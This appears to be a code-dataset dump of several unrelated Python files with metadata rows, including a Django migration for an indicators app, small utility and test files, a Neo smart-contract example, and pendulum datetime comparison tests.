qml_imports.add("Qt.labs.folderlistmodel")
from .__list__ import * # noqa
| 26
| 53
| 0.823077
| 17
| 130
| 5.588235
| 0.764706
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 130
| 4
| 54
| 32.5
| 0.811966
| 0.030769
| 0
| 0
| 0
| 0
| 0.185484
| 0.185484
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c763a9dc6d8bcd0dbfdc07487d21e32a6862cad1
| 14,657
|
py
|
Python
|
indicators/migrations/0002_auto_20200215_0114.py
|
mikael19/activity
|
3932de42d9b423bff5739f7e06520035df213fc6
|
[
"Apache-2.0"
] | 60
|
2020-02-13T17:20:43.000Z
|
2022-03-12T19:26:04.000Z
|
indicators/migrations/0002_auto_20200215_0114.py
|
mikael19/activity
|
3932de42d9b423bff5739f7e06520035df213fc6
|
[
"Apache-2.0"
] | 449
|
2020-02-12T22:18:00.000Z
|
2022-03-11T23:36:59.000Z
|
indicators/migrations/0002_auto_20200215_0114.py
|
mikael19/activity
|
3932de42d9b423bff5739f7e06520035df213fc6
|
[
"Apache-2.0"
] | 31
|
2020-03-07T21:00:54.000Z
|
2021-07-14T18:37:34.000Z
|
# Generated by Django 2.2.10 on 2020-02-15 09:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated (Django 2.2.10) second migration for the indicators app.

    Adds every relational field (ForeignKey / ManyToManyField) to the models
    created in ``0001_initial``, wiring them to the ``workflow`` app and to the
    project's swappable user model.  This file is auto-generated: prefer
    generating a new migration over hand-editing it.
    """

    initial = True

    # Relations below reference the user model and both apps' initial schemas.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('indicators', '0001_initial'),
        ('workflow', '0001_initial'),
    ]

    operations = [
        # -- StrategicObjective / ReportingPeriod / PeriodicTarget / Objective --
        migrations.AddField(
            model_name='strategicobjective',
            name='country',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Country'),
        ),
        migrations.AddField(
            model_name='strategicobjective',
            name='organization',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Organization'),
        ),
        migrations.AddField(
            model_name='strategicobjective',
            name='parent',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='children', to='indicators.StrategicObjective'),
        ),
        migrations.AddField(
            model_name='reportingperiod',
            name='frequency',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.ReportingFrequency'),
        ),
        migrations.AddField(
            model_name='periodictarget',
            name='indicator',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='indicators.Indicator'),
        ),
        migrations.AddField(
            model_name='objective',
            name='parent',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='children', to='indicators.Objective'),
        ),
        migrations.AddField(
            model_name='objective',
            name='program',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Program'),
        ),
        # -- Indicator --
        migrations.AddField(
            model_name='indicator',
            name='approval_submitted_by',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='indicator_submitted_by', to='workflow.ActivityUser'),
        ),
        migrations.AddField(
            model_name='indicator',
            name='approved_by',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='approving_indicator', to='workflow.ActivityUser'),
        ),
        migrations.AddField(
            model_name='indicator',
            name='data_collection_frequency',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.DataCollectionFrequency', verbose_name='Data collection frequency'),
        ),
        migrations.AddField(
            model_name='indicator',
            name='disaggregation',
            field=models.ManyToManyField(blank=True, related_name='indicator_disaggregation_types', to='indicators.DisaggregationType'),
        ),
        migrations.AddField(
            model_name='indicator',
            name='external_service_record',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.ExternalServiceRecord', verbose_name='External Service ID'),
        ),
        migrations.AddField(
            model_name='indicator',
            name='indicator_type',
            field=models.ManyToManyField(blank=True, help_text=' ', to='indicators.IndicatorType'),
        ),
        migrations.AddField(
            model_name='indicator',
            name='level',
            field=models.ManyToManyField(blank=True, help_text=' ', to='indicators.Level'),
        ),
        migrations.AddField(
            model_name='indicator',
            name='objectives',
            field=models.ManyToManyField(blank=True, help_text=' ', related_name='obj_indicator', to='indicators.Objective', verbose_name='Objective'),
        ),
        migrations.AddField(
            model_name='indicator',
            name='program',
            field=models.ManyToManyField(help_text=' ', to='workflow.Program'),
        ),
        migrations.AddField(
            model_name='indicator',
            name='reporting_frequency',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.ReportingFrequency', verbose_name='Reporting frequency'),
        ),
        migrations.AddField(
            model_name='indicator',
            name='sector',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Sector'),
        ),
        migrations.AddField(
            model_name='indicator',
            name='strategic_objectives',
            field=models.ManyToManyField(blank=True, help_text=' ', related_name='strat_indicator', to='indicators.StrategicObjective', verbose_name='Strategic objective'),
        ),
        # -- Historical* models: DO_NOTHING + related_name='+' (no reverse
        #    accessors).  NOTE(review): these look like django-simple-history
        #    tables — confirm against the models module.
        migrations.AddField(
            model_name='historicalindicator',
            name='approval_submitted_by',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.ActivityUser'),
        ),
        migrations.AddField(
            model_name='historicalindicator',
            name='approved_by',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.ActivityUser'),
        ),
        migrations.AddField(
            model_name='historicalindicator',
            name='data_collection_frequency',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.DataCollectionFrequency', verbose_name='Data collection frequency'),
        ),
        migrations.AddField(
            model_name='historicalindicator',
            name='external_service_record',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.ExternalServiceRecord', verbose_name='External Service ID'),
        ),
        migrations.AddField(
            model_name='historicalindicator',
            name='history_user',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalindicator',
            name='reporting_frequency',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.ReportingFrequency', verbose_name='Reporting frequency'),
        ),
        migrations.AddField(
            model_name='historicalindicator',
            name='sector',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.Sector'),
        ),
        migrations.AddField(
            model_name='historicalcollecteddata',
            name='activity_table',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.ActivityTable'),
        ),
        migrations.AddField(
            model_name='historicalcollecteddata',
            name='agreement',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.ProjectAgreement', verbose_name='Project Initiation'),
        ),
        migrations.AddField(
            model_name='historicalcollecteddata',
            name='approved_by',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.ActivityUser', verbose_name='Originated By'),
        ),
        migrations.AddField(
            model_name='historicalcollecteddata',
            name='complete',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.ProjectComplete'),
        ),
        migrations.AddField(
            model_name='historicalcollecteddata',
            name='evidence',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.Documentation', verbose_name='Evidence Document or Link'),
        ),
        migrations.AddField(
            model_name='historicalcollecteddata',
            name='history_user',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalcollecteddata',
            name='indicator',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.Indicator'),
        ),
        migrations.AddField(
            model_name='historicalcollecteddata',
            name='periodic_target',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='indicators.PeriodicTarget'),
        ),
        migrations.AddField(
            model_name='historicalcollecteddata',
            name='program',
            field=models.ForeignKey(blank=True, db_constraint=False, help_text=' ', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='workflow.Program'),
        ),
        # -- Lookup / disaggregation models --
        migrations.AddField(
            model_name='externalservicerecord',
            name='external_service',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.ExternalService'),
        ),
        migrations.AddField(
            model_name='disaggregationvalue',
            name='disaggregation_label',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='indicators.DisaggregationLabel'),
        ),
        migrations.AddField(
            model_name='disaggregationtype',
            name='country',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Country'),
        ),
        migrations.AddField(
            model_name='disaggregationlabel',
            name='disaggregation_type',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='disaggregation_label', to='indicators.DisaggregationType'),
        ),
        # -- CollectedData / ActivityTable --
        migrations.AddField(
            model_name='collecteddata',
            name='activity_table',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.ActivityTable'),
        ),
        migrations.AddField(
            model_name='collecteddata',
            name='agreement',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='q_agreement2', to='workflow.ProjectAgreement', verbose_name='Project Initiation'),
        ),
        migrations.AddField(
            model_name='collecteddata',
            name='approved_by',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='approving_data', to='workflow.ActivityUser', verbose_name='Originated By'),
        ),
        migrations.AddField(
            model_name='collecteddata',
            name='complete',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='q_complete2', to='workflow.ProjectComplete'),
        ),
        migrations.AddField(
            model_name='collecteddata',
            name='disaggregation_value',
            field=models.ManyToManyField(blank=True, help_text=' ', to='indicators.DisaggregationValue'),
        ),
        migrations.AddField(
            model_name='collecteddata',
            name='evidence',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.Documentation', verbose_name='Evidence Document or Link'),
        ),
        migrations.AddField(
            model_name='collecteddata',
            name='indicator',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.Indicator'),
        ),
        migrations.AddField(
            model_name='collecteddata',
            name='periodic_target',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, to='indicators.PeriodicTarget'),
        ),
        migrations.AddField(
            model_name='collecteddata',
            name='program',
            field=models.ForeignKey(blank=True, help_text=' ', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='i_program', to='workflow.Program'),
        ),
        migrations.AddField(
            model_name='collecteddata',
            name='site',
            field=models.ManyToManyField(blank=True, help_text=' ', to='workflow.SiteProfile'),
        ),
        migrations.AddField(
            model_name='activitytable',
            name='country',
            field=models.ManyToManyField(blank=True, to='workflow.Country'),
        ),
        migrations.AddField(
            model_name='activitytable',
            name='owner',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.ActivityUser'),
        ),
    ]
| 53.298182
| 244
| 0.649246
| 1,495
| 14,657
| 6.182609
| 0.081605
| 0.099318
| 0.126907
| 0.148978
| 0.883371
| 0.87147
| 0.781781
| 0.686682
| 0.67186
| 0.617224
| 0
| 0.002282
| 0.222692
| 14,657
| 274
| 245
| 53.492701
| 0.809006
| 0.003138
| 0
| 0.715356
| 1
| 0
| 0.21035
| 0.087001
| 0.052434
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011236
| 0
| 0.026217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c799bd601ff7c758892430bc486153c9beeec9b6
| 125
|
py
|
Python
|
Introduction/Write a function.py
|
Code-With-Aagam/python-hackerrank
|
270c75cf2ca30916183c7fe5ca130a64c7a8ed6d
|
[
"MIT"
] | 3
|
2022-03-05T15:38:26.000Z
|
2022-03-09T13:39:30.000Z
|
Introduction/Write a function.py
|
Code-With-Aagam/python-hackerrank
|
270c75cf2ca30916183c7fe5ca130a64c7a8ed6d
|
[
"MIT"
] | null | null | null |
Introduction/Write a function.py
|
Code-With-Aagam/python-hackerrank
|
270c75cf2ca30916183c7fe5ca130a64c7a8ed6d
|
[
"MIT"
] | null | null | null |
import calendar # Don't reinvent the wheel
def is_leap(year):
    """Return True when *year* is a leap year under Gregorian rules.

    Delegates to the standard library rather than re-deriving the
    divisible-by-4/100/400 logic.
    """
    return calendar.isleap(year)
| 31.25
| 43
| 0.72
| 19
| 125
| 4.684211
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208
| 125
| 4
| 44
| 31.25
| 0.89899
| 0.368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
c7adb1e495d2cb961e163ef20e979fdb660c4439
| 192
|
py
|
Python
|
cvrapi_client/exceptions.py
|
cliisberg/cvrapi-python-client
|
17582ca56cba322e2146e433db62a57b2d5bcb24
|
[
"MIT"
] | null | null | null |
cvrapi_client/exceptions.py
|
cliisberg/cvrapi-python-client
|
17582ca56cba322e2146e433db62a57b2d5bcb24
|
[
"MIT"
] | null | null | null |
cvrapi_client/exceptions.py
|
cliisberg/cvrapi-python-client
|
17582ca56cba322e2146e433db62a57b2d5bcb24
|
[
"MIT"
] | null | null | null |
class ApiError(Exception):
    """Exception carrying an API error message plus its HTTP status code.

    Attributes:
        message: human-readable error text (also what ``str()`` returns).
        status_code: the HTTP status returned by the API.
    """

    def __init__(self, error, status_code):
        self.status_code = status_code
        self.message = error

    def __str__(self):
        return self.message
| 21.333333
| 43
| 0.65625
| 23
| 192
| 5
| 0.521739
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.260417
| 192
| 8
| 44
| 24
| 0.809859
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
c7b00e93508068c64d3d5b09018cb0555cc8dd06
| 78
|
py
|
Python
|
mol/tests/test_util2.py
|
TzuTingWei/mol
|
9499925443f389d8e960b6d656f2953d21df3e3b
|
[
"MIT"
] | null | null | null |
mol/tests/test_util2.py
|
TzuTingWei/mol
|
9499925443f389d8e960b6d656f2953d21df3e3b
|
[
"MIT"
] | null | null | null |
mol/tests/test_util2.py
|
TzuTingWei/mol
|
9499925443f389d8e960b6d656f2953d21df3e3b
|
[
"MIT"
] | null | null | null |
import mol
def test_distance():
    """Distance between two points one unit apart along the second axis."""
    point_a = [0, 1]
    point_b = [0, 2]
    assert mol.util.distance(point_a, point_b) == 1
| 15.6
| 44
| 0.653846
| 14
| 78
| 3.571429
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074627
| 0.141026
| 78
| 4
| 45
| 19.5
| 0.671642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c7f0ef5810962551658faf34d1da1237450363e9
| 275
|
py
|
Python
|
boa3_test/test_sc/interop_test/blockchain/GetTransactionFromBlockUInt256.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3_test/test_sc/interop_test/blockchain/GetTransactionFromBlockUInt256.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3_test/test_sc/interop_test/blockchain/GetTransactionFromBlockUInt256.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
from boa3.builtin import public
from boa3.builtin.interop.blockchain import Transaction, get_transaction_from_block
from boa3.builtin.type import UInt256
@public
def main(hash_: UInt256, tx_index: int) -> Transaction:
    """Return transaction number *tx_index* from the block with hash *hash_*."""
    transaction = get_transaction_from_block(hash_, tx_index)
    return transaction
| 30.555556
| 83
| 0.821818
| 39
| 275
| 5.538462
| 0.487179
| 0.111111
| 0.208333
| 0.212963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036735
| 0.109091
| 275
| 8
| 84
| 34.375
| 0.844898
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.5
| 0.166667
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
40423128534b98189b764fa4b5faf54da78b8c46
| 10,756
|
py
|
Python
|
tests/datetime/test_comparison.py
|
aleksey-kutepov/pendulum
|
47ee3f51b0e27ec06a91a2f37d44e54dc31f888e
|
[
"MIT"
] | null | null | null |
tests/datetime/test_comparison.py
|
aleksey-kutepov/pendulum
|
47ee3f51b0e27ec06a91a2f37d44e54dc31f888e
|
[
"MIT"
] | null | null | null |
tests/datetime/test_comparison.py
|
aleksey-kutepov/pendulum
|
47ee3f51b0e27ec06a91a2f37d44e54dc31f888e
|
[
"MIT"
] | null | null | null |
import pytz
from datetime import datetime
import pendulum
from ..conftest import assert_datetime
# Equality (__eq__) between pendulum datetimes and stdlib aware datetimes.
def test_equal_to_true():
    d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
    d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
    d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo=pendulum.UTC)
    assert d2 == d1
    assert d3 == d1


def test_equal_to_false():
    d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
    d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
    d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo=pendulum.UTC)
    assert d2 != d1
    assert d3 != d1


def test_equal_with_timezone_true():
    # 12:00 Toronto and 09:00 Vancouver name the same instant.
    d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
    d2 = pendulum.datetime(2000, 1, 1, 9, 0, 0, tz='America/Vancouver')
    d3 = datetime(2000, 1, 1, 12, 0, 0,
                  tzinfo=pendulum.timezone('America/Toronto'))
    assert d2 == d1
    assert d3 == d1


def test_equal_with_timezone_false():
    d1 = pendulum.datetime(2000, 1, 1, tz='America/Toronto')
    d2 = pendulum.datetime(2000, 1, 1, tz='America/Vancouver')
    d3 = datetime(2000, 1, 1, tzinfo=pendulum.timezone('America/Toronto'))
    assert d2 != d1
    # d3 carries the same pendulum Toronto zone as d1, so it compares equal;
    # only the Vancouver datetime (d2) differs.
    assert d3 == d1
# Inequality (__ne__) mirrors the equality cases above.
def test_not_equal_to_true():
    d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
    d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
    d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo=pendulum.UTC)
    assert d2 != d1
    assert d3 != d1


def test_not_equal_to_false():
    d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
    d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
    d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo=pendulum.UTC)
    assert d2 == d1
    assert d3 == d1


def test_not_equal_with_timezone_true():
    d1 = pendulum.datetime(2000, 1, 1, tz='America/Toronto')
    d2 = pendulum.datetime(2000, 1, 1, tz='America/Vancouver')
    d3 = datetime(2000, 1, 1, tzinfo=pendulum.timezone('America/Toronto'))
    assert d2 != d1
    assert d3 == d1


def test_not_equal_to_none():
    # Deliberate `!= None` (not `is not None`): this exercises __ne__
    # against None rather than identity.
    d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
    assert d1 != None
# Ordering: > and >= against pendulum, stdlib, and pytz-localized datetimes.
def test_greater_than_true():
    d1 = pendulum.datetime(2000, 1, 1)
    d2 = pendulum.datetime(1999, 12, 31)
    d3 = datetime(1999, 12, 31, tzinfo=pendulum.UTC)
    assert d1 > d2
    assert d1 > d3


def test_greater_than_false():
    d1 = pendulum.datetime(2000, 1, 1)
    d2 = pendulum.datetime(2000, 1, 2)
    d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
    assert not d1 > d2
    assert not d1 > d3


def test_greater_than_with_timezone_true():
    # 12:00 Toronto is one second after 08:59:59 Vancouver.
    d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
    d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
    d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 8, 59, 59))
    assert d1 > d2
    assert d1 > d3


def test_greater_than_with_timezone_false():
    # 12:00 Toronto is one second before 09:00:01 Vancouver.
    d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
    d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
    d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 9, 0, 1))
    assert not d1 > d2
    assert not d1 > d3


def test_greater_than_or_equal_true():
    d1 = pendulum.datetime(2000, 1, 1)
    d2 = pendulum.datetime(1999, 12, 31)
    d3 = datetime(1999, 12, 31, tzinfo=pendulum.UTC)
    assert d1 >= d2
    assert d1 >= d3


def test_greater_than_or_equal_true_equal():
    # Boundary case: equal instants satisfy >=.
    d1 = pendulum.datetime(2000, 1, 1)
    d2 = pendulum.datetime(2000, 1, 1)
    d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
    assert d1 >= d2
    assert d1 >= d3


def test_greater_than_or_equal_false():
    d1 = pendulum.datetime(2000, 1, 1)
    d2 = pendulum.datetime(2000, 1, 2)
    d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
    assert not d1 >= d2
    assert not d1 >= d3


def test_greater_than_or_equal_with_timezone_true():
    d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
    d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
    d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 8, 59, 59))
    assert d1 >= d2
    assert d1 >= d3


def test_greater_than_or_equal_with_timezone_false():
    d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
    d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
    d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 9, 0, 1))
    assert not d1 >= d2
    assert not d1 >= d3
def test_less_than_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert d1 < d2
assert d1 < d3
def test_less_than_false():
d1 = pendulum.datetime(2000, 1, 2)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert not d1 < d2
assert not d1 < d3
def test_less_than_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert d1 < d2
assert d1 < d3
def test_less_than_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert not d1 < d2
assert not d1 < d3
def test_less_than_or_equal_true():
    """<= holds when the left operand is the earlier instant."""
    earlier = pendulum.datetime(2000, 1, 1)
    later = pendulum.datetime(2000, 1, 2)
    stdlib_later = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
    assert earlier <= later
    assert earlier <= stdlib_later


def test_less_than_or_equal_true_equal():
    """<= holds when both operands represent the same instant."""
    base = pendulum.datetime(2000, 1, 1)
    same = pendulum.datetime(2000, 1, 1)
    stdlib_same = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
    assert base <= same
    assert base <= stdlib_same


def test_less_than_or_equal_false():
    """<= fails when the left operand is the later instant."""
    later = pendulum.datetime(2000, 1, 2)
    earlier = pendulum.datetime(2000, 1, 1)
    stdlib_earlier = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
    assert not later <= earlier
    assert not later <= stdlib_earlier


def test_less_than_or_equal_with_timezone_true():
    """Cross-timezone <= compares absolute instants, not wall-clock times."""
    vancouver = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
    toronto = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
    stdlib_toronto = pytz.timezone('America/Toronto').localize(
        datetime(2000, 1, 1, 12, 0, 0)
    )
    assert vancouver <= toronto
    assert vancouver <= stdlib_toronto


def test_less_than_or_equal_with_timezone_false():
    """One second past the equivalent instant makes <= false."""
    vancouver = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
    toronto = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
    stdlib_toronto = pytz.timezone('America/Toronto').localize(
        datetime(2000, 1, 1, 12, 0, 0)
    )
    assert not vancouver <= toronto
    assert not vancouver <= stdlib_toronto
def test_is_birthday():
    """is_birthday() matches month/day against now, or against a given date."""
    with pendulum.test(pendulum.now()):
        today = pendulum.now()
        assert today.subtract(years=1).is_birthday()
        assert not today.subtract(days=1).is_birthday()
        assert not today.add(days=2).is_birthday()
    born = pendulum.datetime(1987, 4, 23)
    assert not pendulum.datetime(2014, 9, 26).is_birthday(born)
    assert pendulum.datetime(2014, 4, 23).is_birthday(born)
def test_closest():
    """closest() picks the candidate nearest the instance, order-independent."""
    anchor = pendulum.datetime(2015, 5, 28, 12, 0, 0)
    before = pendulum.datetime(2015, 5, 28, 11, 0, 0)
    after = pendulum.datetime(2015, 5, 28, 14, 0, 0)
    assert anchor.closest(before, after) == before
